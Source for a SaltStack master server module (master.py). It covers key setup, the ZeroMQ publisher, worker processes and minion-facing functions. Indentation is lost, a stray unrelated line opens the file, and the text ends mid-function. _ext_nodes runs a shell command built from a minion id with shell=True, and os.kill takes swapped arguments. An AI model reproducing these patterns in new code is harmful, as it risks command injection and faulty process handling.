TestScheduler.run_with_standard_middleware(Process(target=run), remote_config)
|
master.py | '''
This module contains all of the routines needed to set up a master server, this
involves preparing the three listeners and the workers needed by the master.
'''
# Import python libs
import os
import re
import time
import errno
import fnmatch
import signal
import shutil
import stat
import logging
import hashlib
import datetime
try:
import pwd
except ImportError: # This is in case windows minion is importing
pass
import getpass
import resource
import subprocess
import multiprocessing
import sys
# Import third party libs
import zmq
import yaml
from M2Crypto import RSA
# Import salt libs
import salt.crypt
import salt.utils
import salt.client
import salt.payload
import salt.pillar
import salt.state
import salt.runner
import salt.auth
import salt.wheel
import salt.minion
import salt.search
import salt.key
import salt.fileserver
import salt.utils.atomicfile
import salt.utils.event
import salt.utils.verify
import salt.utils.minions
import salt.utils.gzip_util
from salt.utils.debug import enable_sigusr1_handler
from salt.exceptions import SaltMasterError, MasterExit
from salt.utils.event import tagify
log = logging.getLogger(__name__)
def clean_proc(proc, wait_for_kill=10):
'''
Generic method for cleaning up multiprocessing procs
'''
# NoneType and other fun stuff need not apply
if not proc:
return
try:
waited = 0
while proc.is_alive():
proc.terminate()
waited += 1
time.sleep(0.1)
if proc.is_alive() and (waited >= wait_for_kill):
log.error(
'Process did not die with terminate(): {0}'.format(
proc.pid
)
)
os.kill(signal.SIGKILL, proc.pid)
except (AssertionError, AttributeError):
# Catch AssertionError when the proc is evaluated inside the child
# Catch AttributeError when the process dies between proc.is_alive()
# and proc.terminate() and turns into a NoneType
pass
class SMaster(object):
'''
Create a simple salt-master, this will generate the top level master
'''
def __init__(self, opts):
'''
Create a salt master server instance
'''
self.opts = opts
self.master_key = salt.crypt.MasterKeys(self.opts)
self.key = self.__prep_key()
self.crypticle = self.__prep_crypticle()
def __prep_crypticle(self):
'''
Return the crypticle used for AES
'''
return salt.crypt.Crypticle(self.opts, self.opts['aes'])
def __prep_key(self):
'''
A key needs to be placed in the filesystem with permissions 0400 so
clients are required to run as root.
'''
users = []
keys = {}
acl_users = set(self.opts['client_acl'].keys())
if self.opts.get('user'):
acl_users.add(self.opts['user'])
acl_users.add(getpass.getuser())
for user in pwd.getpwall():
users.append(user.pw_name)
for user in acl_users:
log.info(
'Preparing the {0} key for local communication'.format(
user
)
)
cumask = os.umask(191)
if user not in users:
try:
founduser = pwd.getpwnam(user)
except KeyError:
log.error('ACL user {0} is not available'.format(user))
continue
keyfile = os.path.join(
self.opts['cachedir'], '.{0}_key'.format(user)
)
if os.path.exists(keyfile):
log.debug('Removing stale keyfile: {0}'.format(keyfile))
os.unlink(keyfile)
key = salt.crypt.Crypticle.generate_key_string()
with salt.utils.fopen(keyfile, 'w+') as fp_:
fp_.write(key)
os.umask(cumask)
os.chmod(keyfile, 256)
try:
os.chown(keyfile, pwd.getpwnam(user).pw_uid, -1)
except OSError:
# The master is not being run as root and can therefore not
# chown the key file
pass
keys[user] = key
return keys
class Master(SMaster):
'''
The salt master server
'''
def __init__(self, opts):
'''
Create a salt master server instance
'''
SMaster.__init__(self, opts)
def _clear_old_jobs(self):
'''
The clean old jobs function is the general passive maintenance process
controller for the Salt master. This is where any data that needs to
be cleanly maintained from the master is maintained.
'''
jid_root = os.path.join(self.opts['cachedir'], 'jobs')
search = salt.search.Search(self.opts)
last = int(time.time())
rotate = int(time.time())
fileserver = salt.fileserver.Fileserver(self.opts)
runners = salt.loader.runner(self.opts)
schedule = salt.utils.schedule.Schedule(self.opts, runners)
while True:
now = int(time.time())
loop_interval = int(self.opts['loop_interval'])
if self.opts['keep_jobs'] != 0 and (now - last) >= loop_interval:
cur = '{0:%Y%m%d%H}'.format(datetime.datetime.now())
if os.path.exists(jid_root):
for top in os.listdir(jid_root):
t_path = os.path.join(jid_root, top)
for final in os.listdir(t_path):
f_path = os.path.join(t_path, final)
jid_file = os.path.join(f_path, 'jid')
if not os.path.isfile(jid_file):
continue
with salt.utils.fopen(jid_file, 'r') as fn_:
jid = fn_.read()
if len(jid) < 18:
# Invalid jid, scrub the dir
shutil.rmtree(f_path)
elif int(cur) - int(jid[:10]) > \
self.opts['keep_jobs']:
shutil.rmtree(f_path)
if self.opts.get('publish_session'):
if now - rotate >= self.opts['publish_session'] * 60:
salt.crypt.dropfile(self.opts['cachedir'])
rotate = now
if self.opts.get('search'):
if now - last >= self.opts['search_index_interval']:
search.index()
try:
if not fileserver.servers:
log.error('No fileservers loaded, The master will not be'
'able to serve files to minions')
raise SaltMasterError('No fileserver backends available')
fileserver.update()
except Exception as exc:
log.error(
'Exception {0} occurred in file server update'.format(exc)
)
try:
schedule.eval()
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if schedule.loop_interval < loop_interval:
loop_interval = schedule.loop_interval
except Exception as exc:
log.error(
'Exception {0} occurred in scheduled job'.format(exc)
)
last = now
try:
time.sleep(loop_interval)
except KeyboardInterrupt:
break
def __set_max_open_files(self):
# Let's check to see how our max open files(ulimit -n) setting is
mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE)
if mof_h == resource.RLIM_INFINITY:
# Unclear what to do with infinity... OSX reports RLIM_INFINITY as
# hard limit,but raising to anything above soft limit fails...
mof_h = mof_s
log.info(
'Current values for max open files soft/hard setting: '
'{0}/{1}'.format(
mof_s, mof_h
)
)
# Let's grab, from the configuration file, the value to raise max open
# files to
mof_c = self.opts['max_open_files']
if mof_c > mof_h:
# The configured value is higher than what's allowed
log.info(
'The value for the \'max_open_files\' setting, {0}, is higher '
'than what the user running salt is allowed to raise to, {1}. '
'Defaulting to {1}.'.format(mof_c, mof_h)
)
mof_c = mof_h
if mof_s < mof_c:
# There's room to raise the value. Raise it!
log.info('Raising max open files value to {0}'.format(mof_c))
resource.setrlimit(resource.RLIMIT_NOFILE, (mof_c, mof_h))
try:
mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE)
log.info(
'New values for max open files soft/hard values: '
'{0}/{1}'.format(mof_s, mof_h)
)
except ValueError:
# https://github.com/saltstack/salt/issues/1991#issuecomment-13025595
# A user under OSX reported that our 100000 default value is
# still too high.
log.critical(
'Failed to raise max open files setting to {0}. If this '
'value is too low. The salt-master will most likely fail '
'to run properly.'.format(
mof_c
)
)
def _pre_flight(self):
'''
Run pre flight checks, if anything in this method fails then the master
should not start up
'''
errors = []
fileserver = salt.fileserver.Fileserver(self.opts)
if not fileserver.servers:
errors.append(
'Failed to load fileserver backends, the configured backends '
'are:\n{0}'.format(
' '.join(self.opts['fileserver_backend'])
)
)
if not self.opts['fileserver_backend']:
errors.append('No fileserver backends are configured')
if errors:
for error in errors:
log.error(error)
log.error('Master failed pre flight checks, exiting\n')
sys.exit(1)
def start(self):
'''
Turn on the master server components
'''
self._pre_flight()
log.info(
'salt-master is starting as user \'{0}\''.format(getpass.getuser())
)
enable_sigusr1_handler()
self.__set_max_open_files()
clear_old_jobs_proc = multiprocessing.Process(
target=self._clear_old_jobs)
clear_old_jobs_proc.start()
reqserv = ReqServer(
self.opts,
self.crypticle,
self.key,
self.master_key)
reqserv.start_publisher()
reqserv.start_event_publisher()
reqserv.start_reactor()
def sigterm_clean(signum, frame):
'''
Cleaner method for stopping multiprocessing processes when a
SIGTERM is encountered. This is required when running a salt
master under a process minder like daemontools
'''
log.warn(
'Caught signal {0}, stopping the Salt Master'.format(
signum
)
)
clean_proc(clear_old_jobs_proc)
clean_proc(reqserv.publisher)
clean_proc(reqserv.eventpublisher)
if hasattr(reqserv, 'reactor'):
clean_proc(reqserv.reactor)
for proc in reqserv.work_procs:
clean_proc(proc)
raise MasterExit
signal.signal(signal.SIGTERM, sigterm_clean)
try:
reqserv.run()
except KeyboardInterrupt:
# Shut the master down gracefully on SIGINT
log.warn('Stopping the Salt Master')
raise SystemExit('\nExiting on Ctrl-c')
class Publisher(multiprocessing.Process):
'''
The publishing interface, a simple zeromq publisher that sends out the
commands.
'''
def __init__(self, opts):
super(Publisher, self).__init__()
self.opts = opts
def run(self):
'''
Bind to the interface specified in the configuration file
'''
# Set up the context
context = zmq.Context(1)
# Prepare minion publish socket
pub_sock = context.socket(zmq.PUB)
# if 2.1 >= zmq < 3.0, we only have one HWM setting
try:
pub_sock.setsockopt(zmq.HWM, 1)
# in zmq >= 3.0, there are separate send and receive HWM settings
except AttributeError:
pub_sock.setsockopt(zmq.SNDHWM, 1)
pub_sock.setsockopt(zmq.RCVHWM, 1)
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
pub_sock.setsockopt(zmq.IPV4ONLY, 0)
pub_uri = 'tcp://{interface}:{publish_port}'.format(**self.opts)
# Prepare minion pull socket
pull_sock = context.socket(zmq.PULL)
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
# Start the minion command publisher
log.info('Starting the Salt Publisher on {0}'.format(pub_uri))
pub_sock.bind(pub_uri)
pull_sock.bind(pull_uri)
# Restrict access to the socket
os.chmod(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc'),
448
)
try:
while True:
# Catch and handle EINTR from when this process is sent
# SIGUSR1 gracefully so we don't choke and die horribly
try:
package = pull_sock.recv()
pub_sock.send(package)
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
raise exc
except KeyboardInterrupt:
if pub_sock.closed is False:
pub_sock.setsockopt(zmq.LINGER, 1)
pub_sock.close()
if pull_sock.closed is False:
pull_sock.setsockopt(zmq.LINGER, 1)
pull_sock.close()
if context.closed is False:
context.term()
class ReqServer(object):
'''
Starts up the master request server, minions send results to this
interface.
'''
def __init__(self, opts, crypticle, key, mkey):
self.opts = opts
self.master_key = mkey
self.context = zmq.Context(self.opts['worker_threads'])
# Prepare the zeromq sockets
self.uri = 'tcp://{interface}:{ret_port}'.format(**self.opts)
self.clients = self.context.socket(zmq.ROUTER)
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self.clients.setsockopt(zmq.IPV4ONLY, 0)
self.workers = self.context.socket(zmq.DEALER)
self.w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
# Prepare the AES key
self.key = key
self.crypticle = crypticle
def __bind(self):
'''
Binds the reply server
'''
dfn = os.path.join(self.opts['cachedir'], '.dfn')
if os.path.isfile(dfn):
try:
os.remove(dfn)
except os.error:
pass
log.info('Setting up the master communication server')
self.clients.bind(self.uri)
self.work_procs = []
for ind in range(int(self.opts['worker_threads'])):
self.work_procs.append(MWorker(self.opts,
self.master_key,
self.key,
self.crypticle))
for ind, proc in enumerate(self.work_procs):
log.info('Starting Salt worker process {0}'.format(ind))
proc.start()
self.workers.bind(self.w_uri)
while True:
try:
zmq.device(zmq.QUEUE, self.clients, self.workers)
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
raise exc
def start_publisher(self):
'''
Start the salt publisher interface
'''
# Start the publisher
self.publisher = Publisher(self.opts)
self.publisher.start()
def start_event_publisher(self):
'''
Start the salt publisher interface
'''
# Start the publisher
self.eventpublisher = salt.utils.event.EventPublisher(self.opts)
self.eventpublisher.start()
def start_reactor(self):
'''
Start the reactor, but only if the reactor interface is configured
'''
if self.opts.get('reactor'):
self.reactor = salt.utils.event.Reactor(self.opts)
self.reactor.start()
def run(self):
'''
Start up the ReqServer
'''
self.__bind()
def destroy(self):
if self.clients.closed is False:
self.clients.setsockopt(zmq.LINGER, 1)
self.clients.close()
if self.workers.closed is False:
self.workers.setsockopt(zmq.LINGER, 1)
self.workers.close()
if self.context.closed is False:
self.context.term()
# Also stop the workers
for worker in self.work_procs:
if worker.is_alive() is True:
worker.terminate()
def __del__(self):
self.destroy()
class MWorker(multiprocessing.Process):
'''
The worker multiprocess instance to manage the backend operations for the
salt master.
'''
def __init__(self,
opts,
mkey,
key,
crypticle):
multiprocessing.Process.__init__(self)
self.opts = opts
self.serial = salt.payload.Serial(opts)
self.crypticle = crypticle
self.mkey = mkey
self.key = key
self.k_mtime = 0
def __bind(self):
'''
Bind to the local port
'''
context = zmq.Context(1)
socket = context.socket(zmq.REP)
w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
log.info('Worker binding to socket {0}'.format(w_uri))
try:
socket.connect(w_uri)
while True:
try:
package = socket.recv()
self._update_aes()
payload = self.serial.loads(package)
ret = self.serial.dumps(self._handle_payload(payload))
socket.send(ret)
# Properly handle EINTR from SIGUSR1
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
raise exc
# Changes here create a zeromq condition, check with thatch45 before
# making any zeromq changes
except KeyboardInterrupt:
socket.close()
def _handle_payload(self, payload):
'''
The _handle_payload method is the key method used to figure out what
needs to be done with communication to the server
'''
try:
key = payload['enc']
load = payload['load']
except KeyError:
return ''
return {'aes': self._handle_aes,
'pub': self._handle_pub,
'clear': self._handle_clear}[key](load)
def _handle_clear(self, load):
'''
Take care of a cleartext command
'''
log.info('Clear payload received with command {cmd}'.format(**load))
if load['cmd'].startswith('__'):
return False
return getattr(self.clear_funcs, load['cmd'])(load)
def _handle_pub(self, load):
'''
Handle a command sent via a public key pair
'''
if load['cmd'].startswith('__'):
return False
log.info('Pubkey payload received with command {cmd}'.format(**load))
def _handle_aes(self, load):
'''
Handle a command sent via an AES key
'''
try:
data = self.crypticle.loads(load)
except Exception:
return ''
if 'cmd' not in data:
log.error('Received malformed command {0}'.format(data))
return {}
log.info('AES payload received with command {0}'.format(data['cmd']))
if data['cmd'].startswith('__'):
return False
return self.aes_funcs.run_func(data['cmd'], data)
def _update_aes(self):
'''
Check to see if a fresh AES key is available and update the components
of the worker
'''
dfn = os.path.join(self.opts['cachedir'], '.dfn')
try:
stats = os.stat(dfn)
except os.error:
return
if stats.st_mode != 0100400:
# Invalid dfn, return
return
if stats.st_mtime > self.k_mtime:
# new key, refresh crypticle
with salt.utils.fopen(dfn) as fp_:
aes = fp_.read()
if len(aes) != 76:
return
self.crypticle = salt.crypt.Crypticle(self.opts, aes)
self.clear_funcs.crypticle = self.crypticle
self.clear_funcs.opts['aes'] = aes
self.aes_funcs.crypticle = self.crypticle
self.aes_funcs.opts['aes'] = aes
self.k_mtime = stats.st_mtime
def run(self):
'''
Start a Master Worker
'''
self.clear_funcs = ClearFuncs(
self.opts,
self.key,
self.mkey,
self.crypticle)
self.aes_funcs = AESFuncs(self.opts, self.crypticle)
self.__bind()
class AESFuncs(object):
'''
Set up functions that are available when the load is encrypted with AES
'''
# The AES Functions:
#
def __init__(self, opts, crypticle):
self.opts = opts
self.event = salt.utils.event.MasterEvent(self.opts['sock_dir'])
self.serial = salt.payload.Serial(opts)
self.crypticle = crypticle
self.ckminions = salt.utils.minions.CkMinions(opts)
# Create the tops dict for loading external top data
self.tops = salt.loader.tops(self.opts)
# Make a client
self.local = salt.client.LocalClient(self.opts['conf_file'])
# Create the master minion to access the external job cache
self.mminion = salt.minion.MasterMinion(
self.opts,
states=False,
rend=False)
self.__setup_fileserver()
def __setup_fileserver(self):
'''
Set the local file objects from the file server interface
'''
fs_ = salt.fileserver.Fileserver(self.opts)
self._serve_file = fs_.serve_file
self._file_hash = fs_.file_hash
self._file_list = fs_.file_list
self._file_list_emptydirs = fs_.file_list_emptydirs
self._dir_list = fs_.dir_list
self._file_envs = fs_.envs
def __verify_minion(self, id_, token):
'''
Take a minion id and a string signed with the minion private key
The string needs to verify as 'salt' with the minion public key
'''
if not salt.utils.verify.valid_id(self.opts, id_):
return False
pub_path = os.path.join(self.opts['pki_dir'], 'minions', id_)
with salt.utils.fopen(pub_path, 'r') as fp_:
minion_pub = fp_.read()
tmp_pub = salt.utils.mkstemp()
with salt.utils.fopen(tmp_pub, 'w+') as fp_:
fp_.write(minion_pub)
pub = None
try:
pub = RSA.load_pub_key(tmp_pub)
except RSA.RSAError as err:
log.error('Unable to load temporary public key "{0}": {1}'
.format(tmp_pub, err))
try:
os.remove(tmp_pub)
if pub.public_decrypt(token, 5) == 'salt':
return True
except RSA.RSAError as err:
log.error('Unable to decrypt token: {0}'.format(err))
log.error('Salt minion claiming to be {0} has attempted to'
'communicate with the master and could not be verified'
.format(id_))
return False
def __verify_minion_publish(self, clear_load):
'''
Verify that the passed information authorized a minion to execute
'''
# Verify that the load is valid
if 'peer' not in self.opts:
return False
if not isinstance(self.opts['peer'], dict):
return False
if any(key not in clear_load for key in ('fun', 'arg', 'tgt', 'ret', 'tok', 'id')):
return False
# If the command will make a recursive publish don't run
if re.match('publish.*', clear_load['fun']):
return False
# Check the permissions for this minion
if not self.__verify_minion(clear_load['id'], clear_load['tok']):
# The minion is not who it says it is!
# We don't want to listen to it!
log.warn(
(
'Minion id {0} is not who it says it is and is attempting '
'to issue a peer command'
).format(clear_load['id'])
)
return False
perms = []
for match in self.opts['peer']:
if re.match(match, clear_load['id']):
# This is the list of funcs/modules!
if isinstance(self.opts['peer'][match], list):
perms.extend(self.opts['peer'][match])
if ',' in clear_load['fun']:
# 'arg': [['cat', '/proc/cpuinfo'], [], ['foo']]
clear_load['fun'] = clear_load['fun'].split(',')
arg_ = []
for arg in clear_load['arg']:
arg_.append(arg.split())
clear_load['arg'] = arg_
good = self.ckminions.auth_check(
perms,
clear_load['fun'],
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'))
if not good:
return False
return True
def _ext_nodes(self, load):
'''
Return the results from an external node classifier if one is
specified
'''
if 'id' not in load:
log.error('Received call for external nodes without an id')
return {}
if not salt.utils.verify.valid_id(self.opts, load['id']):
return {}
ret = {}
# The old ext_nodes method is set to be deprecated in 0.10.4
# and should be removed within 3-5 releases in favor of the
# "master_tops" system
if self.opts['external_nodes']:
if not salt.utils.which(self.opts['external_nodes']):
log.error(('Specified external nodes controller {0} is not'
' available, please verify that it is installed'
'').format(self.opts['external_nodes']))
return {}
cmd = '{0} {1}'.format(self.opts['external_nodes'], load['id'])
ndata = yaml.safe_load(
subprocess.Popen(
cmd,
shell=True,
stdout=subprocess.PIPE
).communicate()[0])
if 'environment' in ndata:
env = ndata['environment']
else:
env = 'base'
if 'classes' in ndata:
if isinstance(ndata['classes'], dict):
ret[env] = list(ndata['classes'])
elif isinstance(ndata['classes'], list):
ret[env] = ndata['classes']
else:
return ret
# Evaluate all configured master_tops interfaces
opts = {}
grains = {}
if 'opts' in load:
opts = load['opts']
if 'grains' in load['opts']:
grains = load['opts']['grains']
for fun in self.tops:
if fun not in self.opts.get('master_tops', {}):
continue
try:
ret.update(self.tops[fun](opts=opts, grains=grains))
except Exception as exc:
# If anything happens in the top generation, log it and move on
log.error(
'Top function {0} failed with error {1} for minion '
'{2}'.format(
fun, exc, load['id']
)
)
return ret
def _master_opts(self, load):
'''
Return the master options to the minion
'''
mopts = {}
file_roots = {}
envs = self._file_envs()
for env in envs:
if env not in file_roots:
file_roots[env] = []
mopts['file_roots'] = file_roots
if load.get('env_only'):
return mopts
mopts['renderer'] = self.opts['renderer']
mopts['failhard'] = self.opts['failhard']
mopts['state_top'] = self.opts['state_top']
mopts['nodegroups'] = self.opts['nodegroups']
mopts['state_auto_order'] = self.opts['state_auto_order']
return mopts
def _mine_get(self, load):
'''
Gathers the data from the specified minions' mine
'''
if any(key not in load for key in ('id', 'tgt', 'fun')):
return {}
ret = {}
if not salt.utils.verify.valid_id(self.opts, load['id']):
return ret
checker = salt.utils.minions.CkMinions(self.opts)
minions = checker.check_minions(
load['tgt'],
load.get('expr_form', 'glob')
)
for minion in minions:
mine = os.path.join(
self.opts['cachedir'],
'minions',
minion,
'mine.p')
try:
with salt.utils.fopen(mine) as fp_:
fdata = self.serial.load(fp_).get(load['fun'])
if fdata:
ret[minion] = fdata
except Exception:
continue
return ret
def _mine(self, load):
'''
Return the mine data
'''
if 'id' not in load or 'data' not in load:
return False
if not salt.utils.verify.valid_id(self.opts, load['id']):
return False
if self.opts.get('minion_data_cache', False) or self.opts.get('enforce_mine_cache', False):
cdir = os.path.join(self.opts['cachedir'], 'minions', load['id'])
if not os.path.isdir(cdir):
os.makedirs(cdir)
datap = os.path.join(cdir, 'mine.p')
if not load.get('clear', False):
if os.path.isfile(datap):
with salt.utils.fopen(datap, 'r') as fp_:
new = self.serial.load(fp_)
if isinstance(new, dict):
new.update(load['data'])
load['data'] = new
with salt.utils.fopen(datap, 'w+') as fp_:
fp_.write(self.serial.dumps(load['data']))
return True
def _file_recv(self, load):
'''
Allows minions to send files to the master, files are sent to the
master file cache
'''
if any(key not in load for key in ('id', 'path', 'loc')):
return False
if not self.opts['file_recv'] or os.path.isabs(load['path']):
return False
if os.path.isabs(load['path']) or '../' in load['path']:
# Can overwrite master files!!
return False
if not salt.utils.verify.valid_id(self.opts, load['id']):
return False
cpath = os.path.join(
self.opts['cachedir'],
'minions',
load['id'],
'files',
load['path'])
cdir = os.path.dirname(cpath)
if not os.path.isdir(cdir):
try:
os.makedirs(cdir)
except os.error:
pass
if os.path.isfile(cpath):
mode = 'w'
else:
mode = 'w+'
with salt.utils.fopen(cpath, mode) as fp_:
if load['loc']:
fp_.seek(load['loc'])
fp_.write(load['data'])
return True
def _pillar(self, load):
'''
Return the pillar data for the minion
'''
if any(key not in load for key in ('id', 'grains', 'env')):
return False
if not salt.utils.verify.valid_id(self.opts, load['id']):
return False
pillar = salt.pillar.Pillar(
self.opts,
load['grains'],
load['id'],
load['env'],
load.get('ext'))
data = pillar.compile_pillar()
if self.opts.get('minion_data_cache', False):
cdir = os.path.join(self.opts['cachedir'], 'minions', load['id'])
if not os.path.isdir(cdir):
os.makedirs(cdir)
datap = os.path.join(cdir, 'data.p')
with salt.utils.fopen(datap, 'w+') as fp_:
fp_.write(
self.serial.dumps(
{'grains': load['grains'],
'pillar': data})
)
return data
def _master_state(self, load):
'''
Call the master to compile a master side highstate
'''
if 'opts' not in load or 'grains' not in load:
return False
return salt.state.master_compile(
self.opts,
load['opts'],
load['grains'],
load['opts']['id'],
load['opts']['environment'])
def _minion_event(self, load):
'''
Receive an event from the minion and fire it on the master event
interface
'''
if 'id' not in load:
return False
if not salt.utils.verify.valid_id(self.opts, load['id']):
return False
if 'events' not in load and ('tag' not in load or 'data' not in load):
return False
if 'events' in load:
for event in load['events']:
self.event.fire_event(event, event['tag']) # old dup event
self.event.fire_event(event, tagify([load['id'], event['tag']], 'minion'))
else:
tag = load['tag']
self.event.fire_event(load, tag) #old dup event
self.event.fire_event(load, tagify([load['id'], tag], 'minion'))
return True
def _return(self, load):
'''
Handle the return data sent from the minions
'''
# If the return data is invalid, just ignore it
if any(key not in load for key in ('return', 'jid', 'id')):
return False
if not salt.utils.verify.valid_id(self.opts, load['id']):
return False
if load['jid'] == 'req':
# The minion is returning a standalone job, request a jobid
load['jid'] = salt.utils.prep_jid(
self.opts['cachedir'],
self.opts['hash_type'],
load.get('nocache', False))
log.info('Got return from {id} for job {jid}'.format(**load))
self.event.fire_event(load, load['jid']) # old dup event
self.event.fire_event(load, tagify([load['jid'], 'ret', load['id']], 'job'))
self.event.fire_ret_load(load)
if self.opts['master_ext_job_cache']:
fstr = '{0}.returner'.format(self.opts['master_ext_job_cache'])
self.mminion.returners[fstr](load)
return
if not self.opts['job_cache'] or self.opts.get('ext_job_cache'):
return
jid_dir = salt.utils.jid_dir(
load['jid'],
self.opts['cachedir'],
self.opts['hash_type']
)
if not os.path.isdir(jid_dir):
log.error(
'An inconsistency occurred, a job was received with a job id '
'that is not present on the master: {jid}'.format(**load)
)
return False
if os.path.exists(os.path.join(jid_dir, 'nocache')):
return
hn_dir = os.path.join(jid_dir, load['id'])
if not os.path.isdir(hn_dir):
os.makedirs(hn_dir)
# Otherwise the minion has already returned this jid and it should
# be dropped
else:
log.error(
'An extra return was detected from minion {0}, please verify '
'the minion, this could be a replay attack'.format(
load['id']
)
)
return False
self.serial.dump(
load['return'],
# Use atomic open here to avoid the file being read before it's
# completely written to. Refs #1935
salt.utils.atomicfile.atomic_open(
os.path.join(hn_dir, 'return.p'), 'w+'
)
)
if 'out' in load:
self.serial.dump(
load['out'],
# Use atomic open here to avoid the file being read before
# it's completely written to. Refs #1935
salt.utils.atomicfile.atomic_open(
os.path.join(hn_dir, 'out.p'), 'w+'
)
)
def _syndic_return(self, load):
'''
Receive a syndic minion return and format it to look like returns from
individual minions.
'''
# Verify the load
if any(key not in load for key in ('return', 'jid', 'id')):
return None
if not salt.utils.verify.valid_id(self.opts, load['id']):
return False
# set the write flag
jid_dir = salt.utils.jid_dir(
load['jid'],
self.opts['cachedir'],
self.opts['hash_type']
)
if not os.path.isdir(jid_dir):
os.makedirs(jid_dir)
if 'load' in load:
with salt.utils.fopen(os.path.join(jid_dir, '.load.p'), 'w+') as fp_:
self.serial.dump(load['load'], fp_)
wtag = os.path.join(jid_dir, 'wtag_{0}'.format(load['id']))
try:
with salt.utils.fopen(wtag, 'w+') as fp_:
fp_.write('')
except (IOError, OSError):
log.error(
'Failed to commit the write tag for the syndic return, are '
'permissions correct in the cache dir: {0}?'.format(
self.opts['cachedir']
)
)
return False
# Format individual return loads
for key, item in load['return'].items():
ret = {'jid': load['jid'],
'id': key,
'return': item}
if 'out' in load:
ret['out'] = load['out']
self._return(ret)
if os.path.isfile(wtag):
os.remove(wtag)
def minion_runner(self, clear_load):
'''
Execute a runner from a minion, return the runner's function data
'''
if 'peer_run' not in self.opts:
return {}
if not isinstance(self.opts['peer_run'], dict):
return {}
if any(key not in clear_load for key in ('fun', 'arg', 'id', 'tok')):
return {}
if not self.__verify_minion(clear_load['id'], clear_load['tok']):
# The minion is not who it says it is!
# We don't want to listen to it!
log.warn(
'Minion id {0} is not who it says it is!'.format(
clear_load['id']
)
)
return {}
perms = set()
for match in self.opts['peer_run']:
if re.match(match, clear_load['id']):
# This is the list of funcs/modules!
if isinstance(self.opts['peer_run'][match], list):
perms.update(self.opts['peer_run'][match])
good = False
for perm in perms:
if re.match(perm, clear_load['fun']):
good = True
if not good:
return {}
# Prepare the runner object
opts = {'fun': clear_load['fun'],
'arg': clear_load['arg'],
'id': clear_load['id'],
'doc': False,
'conf_file': self.opts['conf_file']}
opts.update(self.opts)
runner = salt.runner.Runner(opts)
return runner.run()
def pub_ret(self, load):
'''
Request the return data from a specific jid, only allowed
if the requesting minion also initialted the execution.
'''
if any(key not in load for key in ('jid', 'id', 'tok')):
return {}
if not self.__verify_minion(load['id'], load['tok']):
# The minion is not who it says it is!
# We don't want to listen to it!
log.warn(
'Minion id {0} is not who it says it is!'.format(
load['id']
)
)
return {}
# Check that this minion can access this data
auth_cache = os.path.join(
self.opts['cachedir'],
'publish_auth')
if not os.path.isdir(auth_cache):
os.makedirs(auth_cache)
jid_fn = os.path.join(auth_cache, load['jid'])
with salt.utils.fopen(jid_fn, 'r') as fp_:
if not load['id'] == fp_.read():
return {}
# Grab the latest and return
return self.local.get_cache_returns(load['jid'])
def minion_pub(self, clear_load):
'''
Publish a command initiated from a minion, this method executes minion
restrictions so that the minion publication will only work if it is
enabled in the config.
The configuration on the master allows minions to be matched to
salt functions, so the minions can only publish allowed salt functions
The config will look like this:
peer:
.*:
- .*
This configuration will enable all minions to execute all commands.
peer:
foo.example.com:
- test.*
This configuration will only allow the minion foo.example.com to
execute commands from the test module
'''
if not self.__verify_minion_publish(clear_load):
return {}
# Set up the publication payload
load = {
'fun': clear_load['fun'],
'arg': clear_load['arg'],
'expr_form': clear_load.get('tgt_type', 'glob'),
'tgt': clear_load['tgt'],
'ret': clear_load['ret'],
'id': clear_load['id'],
}
if 'tgt_type' in clear_load:
if clear_load['tgt_type'].startswith('node'):
if clear_load['tgt'] in self.opts['nodegroups']:
load['tgt'] = self.opts['nodegroups'][clear_load['tgt']]
load['expr_form_type'] = 'compound'
load['expr_form'] = clear_load['tgt_type']
else:
return {}
else:
load['expr_form'] = clear_load['tgt_type']
ret = {}
ret['jid'] = self.local.cmd_async(**load)
ret['minions'] = self.ckminions.check_minions(
clear_load['tgt'],
load['expr_form'])
auth_cache = os.path.join(
self.opts['cachedir'],
'publish_auth')
if not os.path.isdir(auth_cache):
os.makedirs(auth_cache)
jid_fn = os.path.join(auth_cache, ret['jid'])
with salt.utils.fopen(jid_fn, 'w+') as fp_:
fp_.write(clear_load['id'])
return ret
def minion_publish(self, clear_load):
'''
Publish a command initiated from a minion, this method executes minion
restrictions so that the minion publication will only work if it is
enabled in the config.
The configuration on the master allows minions to be matched to
salt functions, so the minions can only publish allowed salt functions
The config will look like this:
peer:
.*:
- .*
This configuration will enable all minions to execute all commands.
peer:
foo.example.com:
- test.*
This configuration will only allow the minion foo.example.com to
execute commands from the test module
'''
if not self.__verify_minion_publish(clear_load):
return {}
# Set up the publication payload
load = {
'fun': clear_load['fun'],
'arg': clear_load['arg'],
'expr_form': clear_load.get('tgt_type', 'glob'),
'tgt': clear_load['tgt'],
'ret': clear_load['ret'],
'id': clear_load['id'],
}
if 'tmo' in clear_load:
try:
load['timeout'] = int(clear_load['tmo'])
except ValueError:
msg = 'Failed to parse timeout value: {0}'.format(
clear_load['tmo'])
log.warn(msg)
return {}
if 'timeout' in clear_load:
try:
load['timeout'] = int(clear_load['timeout'])
except ValueError:
msg = 'Failed to parse timeout value: {0}'.format(
clear_load['tmo'])
log.warn(msg)
return {}
if 'tgt_type' in clear_load:
if clear_load['tgt_type'].startswith('node'):
if clear_load['tgt'] in self.opts['nodegroups']:
load['tgt'] = self.opts['nodegroups'][clear_load['tgt']]
load['expr_form_type'] = 'compound'
else:
return {}
else:
load['expr_form'] = clear_load['tgt_type']
load['raw'] = True
ret = {}
for minion in self.local.cmd_iter(**load):
if clear_load.get('form', '') == 'full':
data = minion
if 'jid' in minion:
ret['__jid__'] = minion['jid']
data['ret'] = data.pop('return')
ret[minion['id']] = data
else:
ret[minion['id']] = minion['return']
if 'jid' in minion:
ret['__jid__'] = minion['jid']
